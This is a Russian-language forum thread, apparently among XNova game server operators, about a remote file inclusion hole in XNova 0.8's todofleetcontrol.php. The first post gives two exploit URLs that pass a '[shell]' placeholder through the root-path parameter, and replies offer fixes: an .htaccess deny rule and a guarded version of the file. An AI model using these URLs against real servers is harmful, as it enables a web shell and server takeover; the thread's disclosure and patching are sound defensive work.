Вот такой вот инклюд

legalize

Новичок
Репутация
0 / 1 141
Программа: XNova 0.8 sp1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценарием todofleetcontrol.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?

Для новой версии xnova:

target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?


На хакерском форуме увидел... =)
 
ага ,было такое . где то я видел фикс к нему
 
в папку includes киньте .htaccess c содержанием deny from all и пуся ломают на здоровье
 
А можно еще вот так вот сделать

Код:
<?php
/**
 * @author Chlorel
 *
 * @package XNova
 * @version 0.8
 * @copyright (c) 2008 XNova Group
 * @license [url]http://opensource.org/licenses/gpl-license.php[/url] GNU Public License
 */

if (!defined('INSIDE')) {
    die('Hacking attemp');
}

// Functions already 'with the propre'
define('INSIDE' , true);
define('INSTALL', false);

// open all files inside functions folder
$dir = opendir($ugamela_root_path . 'includes/functions');

while (($file = readdir($dir)) !== false) {
    // we check if the file is a include file
    $extension = '.' . substr($file, -3);
    // and include once the file
    if ($extension == ".$phpEx")
        require_once $ugamela_root_path . 'includes/functions/' . $file;
}

?>
 

Похожие темы

Сверху